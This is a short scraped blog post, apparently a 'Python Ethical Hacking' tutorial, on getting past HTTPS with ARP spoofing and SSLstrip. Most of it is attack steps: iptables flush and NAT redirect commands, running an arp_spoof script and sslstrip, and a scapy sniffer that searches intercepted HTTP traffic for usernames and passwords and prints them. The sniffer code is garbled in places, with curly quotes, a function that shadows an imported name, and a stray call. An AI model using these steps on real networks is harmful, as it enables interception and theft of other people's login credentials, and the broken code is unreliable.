标签:uri email read return margin end scapy rds lse
HTTPS:
Problem:
-> not secure
Solution:
ARP Spoofing
ARP Spoofing With SSLStrip
1. Flush route tables and execute the arp_spoof script.
iptables --flush
python3 arp_spoof.py
2. Start the SSLstrip.
sslstrip
3. Execute the following commands to redirect the packets.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
4. Run the sniff script.
#!/usr/bin/env python import scapy from scapy.layers.http import HTTPRequest from scapy.packet import Raw from scapy.sendrecv import sniff def sniff(interface): scapy.sendrecv.sniff(iface=interface, store=False, prn=process_sniffed_packet) def get_url(packet): return packet[HTTPRequest].Host.decode(errors=‘ignore‘) + packet[HTTPRequest].Path.decode(errors=‘ignore‘) def get_login_info(packet): if packet.haslayer(Raw): packet.show() load = packet[Raw].load keywords = ["email", "username", "user", "login", "password", "pass", "uid"] for keyword in keywords: if keyword in load: return load def process_sniffed_packet(packet): if packet.haslayer(HTTPRequest): url = get_url(packet) print("[+] HTTP Request >> " + url) login_info = get_login_info(packet) if login_info: print("\n\n[+] Possible username/password > " + login_info + "\n\n") scapy.sendrecv.sniff() sniff("eth0")
5. Browse the target website and find something interesting.
Python Ethical Hacking - Bypass HTTPS
标签:uri email read return margin end scapy rds lse
原文地址:https://www.cnblogs.com/keepmoving1113/p/11523455.html
